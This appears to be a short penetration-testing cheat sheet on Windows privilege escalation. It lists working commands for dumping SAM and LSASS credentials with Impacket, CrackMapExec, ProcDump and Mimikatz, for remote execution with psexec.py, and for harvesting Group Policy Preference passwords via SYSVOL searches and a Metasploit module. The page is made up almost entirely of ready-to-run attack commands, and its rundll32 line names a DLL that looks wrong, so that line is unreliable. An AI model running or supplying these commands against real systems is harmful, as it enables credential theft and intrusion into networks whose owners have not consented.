Privilege Escalation

  1. SecretsDump Description: Dump hashed credentials from SAM or LSASS on a domain controller or host. Tools/Commands:

    • Impacket: secretsdump.py <DOMAIN>/<USER>@<IP>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS> --sam

    • psexec.py <DOMAIN>/<USER>@<IP>

  2. LSASS Dumping Description: Extract credentials from LSASS process memory. Tools/Commands:

    • ProcDump: procdump.exe -ma lsass.exe lsass.dmp

    • Mimikatz: sekurlsa::minidump lsass.dmp

    • rundll32.exe C:\path\to\procdump.dll,MiniDump <lsass_pid>

  3. GPP Passwords Description: Extract plaintext passwords stored in Group Policy Preferences files. Tools/Commands:

    • PowerShell: Get-ChildItem \\<DC>\SYSVOL /Recurse | Select-String -Pattern "password"

    • Metasploit: post/windows/gather/credentials/gpp

    • Manual search: Look for files with .xml extensions containing <cpassword> tags.

Last updated